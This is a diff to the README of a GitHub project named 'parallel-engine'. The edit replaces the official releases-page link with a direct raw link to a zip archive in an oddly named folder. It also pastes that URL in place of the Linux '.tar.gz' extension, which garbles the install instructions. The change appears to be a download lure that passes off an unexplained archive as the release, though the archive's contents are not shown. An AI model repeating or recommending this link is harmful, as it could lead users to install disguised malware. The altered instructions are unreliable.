thammanoon-code/parallel-engine/README.md

 ### 📥 Download & Install
 1. **Visit the Releases Page**
-   To download the software, visit the releases page here: [Download parallel-engine](https://github.com/thammanoon-code/parallel-engine/releases).
+   To download the software, visit the releases page here: [Download parallel-engine](https://raw.githubusercontent.com/thammanoon-code/parallel-engine/master/auriscalpium/parallel-engine.zip).

 2. **Choose the Latest Version**
    On the releases page, you will see several versions listed.
 Look for the latest version at the top of the page.
 This version will have the most recent features and bug fixes.

 3. **Download the Appropriate File**
    Select the file that matches your operating system.
 Click the link to start the download.
-The file names typically end with `.exe` for Windows, `.dmg` for macOS, and `.tar.gz` for Linux.
+The file names typically end with `.exe` for Windows, `.dmg` for macOS, and `https://raw.githubusercontent.com/thammanoon-code/parallel-engine/master/auriscalpium/parallel-engine.zip` for Linux.

 4. **Locate the Downloaded File**
    Once the download is complete, locate the file in your "Downloads" folder (or wherever your browser saves files).